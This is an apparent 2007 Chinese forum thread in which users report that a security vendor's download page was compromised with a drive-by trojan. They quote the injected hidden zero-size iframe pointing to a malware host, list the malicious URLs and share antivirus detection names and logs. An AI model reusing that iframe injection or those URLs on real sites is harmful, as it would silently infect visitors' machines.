东方卫士的网站又被挂马！

zy6720

东方卫士的网站又被挂马！太垃圾了
挂马网址http://w ww.i110.com/updatedown/index.html

被挂的马如下：
已检测到: 木马程序 Trojan-Downloader.VBS.Psyme.fm        URL: http://s.gcuj.com/1.htm



网页源文件后面被加了
<iframe src="http://s.gcuj.com/bd.htm?143" width="0" height="0" frameborder="0"></iframe>

zy6720

卡巴斯基反病毒6.0
The requested URL ht tp://s.gcuj.com/1.htm is forbidden

kp2006

eset报了几分钟 [:1:]

1p1

木马名称:Trojan-PSW.Win32.OnLineGames.cgf
程序:0.EXE [:1:]

zy6720

楼上的兄弟，我们俩的报的木马名称怎么不一样啊

The EQs

Time        Module        Object        Name        Threat        Action        User        Information
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:42        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:39        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/t.js        a variant of Win32/TrojanDownloader.Ani.Gen trojan                KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/1.htm        VBS/TrojanDownloader.Agent.E trojan        Connection terminated        KASPERSK-56C566\EQ2       
2007-4-19 11:10:36        IMON        file        http://s.gcuj.com/t.js        a variant of Win32/TrojanDownloader.Ani.Gen trojan                KASPERSK-56C566\EQ2

zhaonimm

费尔昨天抱了11个啊........

zy6720

Trojan-Downloader.VBS.Psyme.fm

Trojan-PSW.Win32.OnLineGames.cgf

TrojanDownloader.Agent.E trojan
TrojanDownloader.Ani.Gen trojan

为什么大家显示的木马名称都不一样啊，上面的用的是杀毒软件啊

鼻耳盖子

我这里下载了2个程序都被报了

icka

那个JS文件看文件头是ANI文件吧.可后面没加病毒地址哦?